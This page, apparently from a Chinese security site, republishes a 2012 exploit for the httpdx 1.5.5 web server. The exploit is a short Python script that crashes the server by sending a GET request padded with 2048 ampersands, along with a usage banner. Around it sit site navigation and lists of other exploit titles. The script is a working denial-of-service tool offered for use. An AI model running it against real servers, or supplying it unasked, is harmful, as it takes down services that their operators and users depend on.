首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
httpdx 1.5.5 Denial of Service
来源:http://snakingmax.blogspot.com/ 作者:SnakingMax 发布时间:2012-08-06  
# Exploit Title: [httpdx 1.5.5 remote D.O.S.]
 # Date: [23/07/2012]
 # Author: [SnakingMax]
 # Website: [http://sourceforge.net/projects/httpdx/]
 # Software Link: [http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.5/httpdx1.5.5.zip/download]
 # Vendor: jazu100
# Category: [Remote Exploit]


from http.client import HTTPConnection
import sys, urllib.request

if ( (__name__)=="__main__" ):
	if len(sys.argv) != 2:
		print("Wellcome to httpdx madafakar tool\n")
		print("Usage: python3 "+sys.argv[0]+" http://www.VulnerableServer.com\n\n")
		print("Downloaded from: http://snakingmax.blogspot.com/")
	else:
		conn = HTTPConnection(sys.argv[1])
		conn.request('GET', '/'+ ('&'*2048) )


#       ____              _    _             __  __
#      / ___| _ __   __ _| | _(_)_ __   __ _|  \/  | __ ___  __
#      \___ \| '_ \ / _` | |/ / | '_ \ / _` | |\/| |/ _` \ \/ /
#       ___) | | | | (_| |   <| | | | | (_| | |  | | (_| |>  <    ____
#  ____|____/|_| |_|\__,_|_|\_\_|_| |_|\__, |_|  |_|\__,_/_/\_\__/ O  \___/
# <\x41\x41\x41\x41\x41\x41\x41\x41\x41|___/\x41\x41\x41\x41\x41______/   \

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Psexec Via Current User Token
·Nvidia Linux Driver Privilege
·Microsoft Internet Explorer Fi
·Dell SonicWALL Scrutinizer 9 S
·WebPageTest Arbitrary PHP File
·Zenoss 3 showDaemonXMLConfig C
·pBot Remote Code Execution
·FreeBSD Kernel SCTP Remote NUL
·SC DHCP 4.1.2 Denial Of Servic
·CoolPlayer Portable 2.19.2 Buf
·Microsoft Office SharePoint Se
·VLC 2.0.2 Division By Zero
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved